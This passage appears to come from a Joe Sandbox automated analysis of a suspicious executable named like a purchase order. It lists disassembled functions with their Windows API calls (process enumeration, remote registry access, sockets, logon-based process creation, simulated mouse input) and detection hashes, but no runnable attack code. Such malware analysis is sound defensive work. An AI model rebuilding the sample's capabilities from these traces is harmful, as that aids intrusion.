                                                                                                                • Part of subcall function 003FD17C: GetStockObject.GDI32(00000011), ref: 003FD1CE
                                                                                                                • Part of subcall function 003FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003FD1D8
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0044A32D
                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0044A33A
                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0044A345
                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0044A354
                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0044A360
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                              • String ID: Msctls_Progress32
                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                              • Opcode ID: bc50a55e77dc0eab0a75d4136291728b3e17d76efab711a632de9de933530e81
                                                                                                              • Instruction ID: 5b278528da9d91365a09309c3efc0e4b99cc6175e20e27b50720dbe34e3db618
                                                                                                              • Opcode Fuzzy Hash: bc50a55e77dc0eab0a75d4136291728b3e17d76efab711a632de9de933530e81
                                                                                                              • Instruction Fuzzy Hash: 8411D0B1540219BEFF118F61CC85EEB7F6DFF08398F014115FA08A60A0C6769C22DBA8
                                                                                                              Function 003FCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetClientRect.USER32(?,?), ref: 003FCCF6
                                                                                                              • GetWindowRect.USER32(?,?), ref: 003FCD37
                                                                                                              • ScreenToClient.USER32(?,?), ref: 003FCD5F
                                                                                                              • GetClientRect.USER32(?,?), ref: 003FCE8C
                                                                                                              • GetWindowRect.USER32(?,?), ref: 003FCEA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1296646539-0
                                                                                                              • Opcode ID: 91cb52111a3341a898b0ef25f33e9e6ce2f0492f46f37726c8edf8794f7dd568
                                                                                                              • Instruction ID: ef9c444c5b9c6ab337243403ef80c47de1252525cbedc91faafd59805af0c339
                                                                                                              • Opcode Fuzzy Hash: 91cb52111a3341a898b0ef25f33e9e6ce2f0492f46f37726c8edf8794f7dd568
                                                                                                              • Instruction Fuzzy Hash: 6AB18B79A0024DDBDF14CFA8C5807EEBBB0FF18301F14912AED59AB251DB34AA50CB64
                                                                                                              Function 00441BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00441C18
                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00441C26
                                                                                                              • __wsplitpath.LIBCMT ref: 00441C54
                                                                                                                • Part of subcall function 00401DFC: __wsplitpath_helper.LIBCMT ref: 00401E3C
                                                                                                              • _wcscat.LIBCMT ref: 00441C69
                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00441CDF
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00441CF1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                              • String ID:
                                                                                                              • API String ID: 1380811348-0
                                                                                                              • Opcode ID: 1225b7efe2668db4adbe558bed2ad9c7ec8bf674ddf0a356833c11eed6731e32
                                                                                                              • Instruction ID: 975f5f87e1dd814f2434525e307771fdd3299a7806a192404c4311e16993890e
                                                                                                              • Opcode Fuzzy Hash: 1225b7efe2668db4adbe558bed2ad9c7ec8bf674ddf0a356833c11eed6731e32
                                                                                                              • Instruction Fuzzy Hash: DC51AEB15043449FD721EF25C881EABB7E8EF88754F00492EF58597291EB74E904CB96
                                                                                                              Function 00442FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00443C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004430AF
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004430EF
                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00443112
                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0044313B
                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0044317E
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0044318B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3451389628-0
                                                                                                              • Opcode ID: 3f0cccf9c976f74cdb364700d2b801b9ecb31b569da8ab4135a5fced347beedb
                                                                                                              • Instruction ID: c6d31bb7cb8015f0a099342b22e639e94d9856a4f26c1d4789155e25455e237e
                                                                                                              • Opcode Fuzzy Hash: 3f0cccf9c976f74cdb364700d2b801b9ecb31b569da8ab4135a5fced347beedb
                                                                                                              • Instruction Fuzzy Hash: 59518631608240AFD705EF65C881E6EBBE9FF88704F044A2EF5558B2A1DB74EA05CB56
                                                                                                              Function 004484DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetMenu.USER32(?), ref: 00448540
                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00448577
                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0044859F
                                                                                                              • GetMenuItemID.USER32(?,?), ref: 0044860E
                                                                                                              • GetSubMenu.USER32(?,?), ref: 0044861C
                                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0044866D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                                              • String ID:
                                                                                                              • API String ID: 650687236-0
                                                                                                              • Opcode ID: c4a0cad86d14c8a11a7d8cae72945d6df9f353e1b6cc4372a74b17da4aebd155
                                                                                                              • Instruction ID: 2849e64676434943888c89ce463f61567d6a1ca4cb59433d71b09a2cf604a6cf
                                                                                                              • Opcode Fuzzy Hash: c4a0cad86d14c8a11a7d8cae72945d6df9f353e1b6cc4372a74b17da4aebd155
                                                                                                              • Instruction Fuzzy Hash: 4351C131E00128EFDF01EF55C941AAEB7F4EF08310F11446AE905BB391DB74AE418B99
                                                                                                              Function 00424AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00424B10
                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00424B5B
                                                                                                              • IsMenu.USER32(00000000), ref: 00424B7B
                                                                                                              • CreatePopupMenu.USER32 ref: 00424BAF
                                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00424C0D
                                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00424C3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3311875123-0
                                                                                                              • Opcode ID: 8e248bb8f5fd4276b5020b39bc0357d628bafd94b78c20242387fb81284dc6af
                                                                                                              • Instruction ID: a8c4154460cb0174a39ebceaed98a50dd48666b9705ec2b1c163a4eeb5ab34a2
                                                                                                              • Opcode Fuzzy Hash: 8e248bb8f5fd4276b5020b39bc0357d628bafd94b78c20242387fb81284dc6af
                                                                                                              • Instruction Fuzzy Hash: 5451D470B01269DBCF20CF69E888BAEBFF4EF84358F54411AE4159A290D3B89940CB59
                                                                                                              Function 00438DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0047DC00), ref: 00438E7C
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00438E89
                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00438EAD
                                                                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00438EC5
                                                                                                              • _strlen.LIBCMT ref: 00438EF7
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00438F6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_strlenselect
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217125717-0
                                                                                                              • Opcode ID: 7e62dfaf5d42950793747a5d0f4b2bb5db23cd8ed910281df2d132b4254802f9
                                                                                                              • Instruction ID: 5ccd522ebab3ecd61b94a008b61c79740cdefce965027be3699bef2f1ba519e2
                                                                                                              • Opcode Fuzzy Hash: 7e62dfaf5d42950793747a5d0f4b2bb5db23cd8ed910281df2d132b4254802f9
                                                                                                              • Instruction Fuzzy Hash: 7841C371A00204AFCB14EB65CD86EAEB7B9AF0C314F10466EF51A972D1DF74AE00CB65
                                                                                                              Function 003FABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • BeginPaint.USER32(?,?,?), ref: 003FAC2A
                                                                                                              • GetWindowRect.USER32(?,?), ref: 003FAC8E
                                                                                                              • ScreenToClient.USER32(?,?), ref: 003FACAB
                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003FACBC
                                                                                                              • EndPaint.USER32(?,?,?,?,?), ref: 003FAD06
                                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0045E673
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                              • String ID:
                                                                                                              • API String ID: 2592858361-0
                                                                                                              • Opcode ID: 55143812b8846ce8313e4410c861311100ec0e52495a36166a56116b2010d1ed
                                                                                                              • Instruction ID: 52e6f9e1a4ba604f2b562386cfa2b8e0ae081ce3f9cfd3365522978c25ac82f0
                                                                                                              • Opcode Fuzzy Hash: 55143812b8846ce8313e4410c861311100ec0e52495a36166a56116b2010d1ed
                                                                                                              • Instruction Fuzzy Hash: B741C2B05007059FC711DF15CC84F7B7BA8EB5A360F040229FAA8C72B1D7749945DB66
                                                                                                              Function 0044E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(004A1628,00000000,004A1628,00000000,00000000,004A1628,?,0045DC5D,00000000,?,00000000,00000000,00000000,?,0045DAD1,00000004), ref: 0044E40B
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0044E42F
                                                                                                              • ShowWindow.USER32(004A1628,00000000), ref: 0044E48F
                                                                                                              • ShowWindow.USER32(00000000,00000004), ref: 0044E4A1
                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0044E4C5
                                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0044E4E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 642888154-0
                                                                                                              • Opcode ID: dbf538ffee0a6ac4d7f107ebce4a3535e2260f8e1897febee977e17b8e53e598
                                                                                                              • Instruction ID: d750839cf408d11370cfb01eb3c7e7cfae3fbc568c245dc429c74eed2edc7f61
                                                                                                              • Opcode Fuzzy Hash: dbf538ffee0a6ac4d7f107ebce4a3535e2260f8e1897febee977e17b8e53e598
                                                                                                              • Instruction Fuzzy Hash: 2B417330A01140EFEB22CF26C499F957BE1BF09314F1941BAEA598F2A2C775E842CB55
                                                                                                              Function 004298BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 004298D1
                                                                                                                • Part of subcall function 003FF4EA: std::exception::exception.LIBCMT ref: 003FF51E
                                                                                                                • Part of subcall function 003FF4EA: __CxxThrowException@8.LIBCMT ref: 003FF533
                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00429908
                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00429924
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0042999E
                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004299B3
                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004299D2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                              • String ID:
                                                                                                              • API String ID: 2537439066-0
                                                                                                              • Opcode ID: daf9b6a3a83fbf137f4c8baf571c8f31b78f5d5ddc1242ac4d126fd4db393720
                                                                                                              • Instruction ID: b84382e03fb57d70fc0614481d82b8ac175fae831b951c641e5acc4946ff033d
                                                                                                              • Opcode Fuzzy Hash: daf9b6a3a83fbf137f4c8baf571c8f31b78f5d5ddc1242ac4d126fd4db393720
                                                                                                              • Instruction Fuzzy Hash: CE319E71E00205AFDB00AFA5DD85EABB778FF45310F1480BAE904AB246E774DE10CBA5
                                                                                                              Function 00439B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,004377F4,?,?,00000000,00000001), ref: 00439B53
                                                                                                                • Part of subcall function 00436544: GetWindowRect.USER32(?,?), ref: 00436557
                                                                                                              • GetDesktopWindow.USER32 ref: 00439B7D
                                                                                                              • GetWindowRect.USER32(00000000), ref: 00439B84
                                                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00439BB6
                                                                                                                • Part of subcall function 00427A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427AD0
                                                                                                              • GetCursorPos.USER32(?), ref: 00439BE2
                                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00439C44
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 4137160315-0
                                                                                                              • Opcode ID: 479a43ac737b961f04efe21cfa30066e905330872d86edd25b13af11830a4cee
                                                                                                              • Instruction ID: 33bcf53fc8ce78c49d7b3bcd45bd942fcd92ece0646ed704509a4c79ac521061
                                                                                                              • Opcode Fuzzy Hash: 479a43ac737b961f04efe21cfa30066e905330872d86edd25b13af11830a4cee
                                                                                                              • Instruction Fuzzy Hash: 3131C172A04315ABD710DF14DC49F9BB7E9FF88314F00092AF595D7281DAB5E904CB96
                                                                                                              Function 0041AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0041AFAE
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0041AFB5
                                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0041AFC4
                                                                                                              • CloseHandle.KERNEL32(00000004), ref: 0041AFCF
                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0041AFFE
                                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 0041B012
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                              • String ID:
                                                                                                              • API String ID: 1413079979-0
                                                                                                              • Opcode ID: a8722b723e5dd6261462c6236aa12d62fa89bca7d265d5a579f3467609dad9b6
                                                                                                              • Instruction ID: 362120cd19681979349f7564d806c4fb3862b508cce9a2d5b266234b4931e5eb
                                                                                                              • Opcode Fuzzy Hash: a8722b723e5dd6261462c6236aa12d62fa89bca7d265d5a579f3467609dad9b6
                                                                                                              • Instruction Fuzzy Hash: 82215072905209AFDF018FA4DD09FEE7BA9EF44308F044026FD01A2261D379DDA5DB66
                                                                                                              Function 0044EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003FAFE3
                                                                                                                • Part of subcall function 003FAF83: SelectObject.GDI32(?,00000000), ref: 003FAFF2
                                                                                                                • Part of subcall function 003FAF83: BeginPath.GDI32(?), ref: 003FB009
                                                                                                                • Part of subcall function 003FAF83: SelectObject.GDI32(?,00000000), ref: 003FB033
                                                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0044EC20
                                                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0044EC34
                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0044EC42
                                                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0044EC52
                                                                                                              • EndPath.GDI32(00000000), ref: 0044EC62
                                                                                                              • StrokePath.GDI32(00000000), ref: 0044EC72
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                              • String ID:
                                                                                                              • API String ID: 43455801-0
                                                                                                              • Opcode ID: ee23967a136459cabe80698f6cdeeb7fed51f8e2b36b8d34274ab7a938715c30
                                                                                                              • Instruction ID: c6b79ccbd03a07cfc343d373c5f3acbc79c76d7f5a86082dd3a8d5079aef4b87
                                                                                                              • Opcode Fuzzy Hash: ee23967a136459cabe80698f6cdeeb7fed51f8e2b36b8d34274ab7a938715c30
                                                                                                              • Instruction Fuzzy Hash: 3D11097290014DBFEB029F90DD88EEA7F6DEB09354F048122FE0989160D7B19D55DBA5
                                                                                                              Function 0041E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDC.USER32(00000000), ref: 0041E1C0
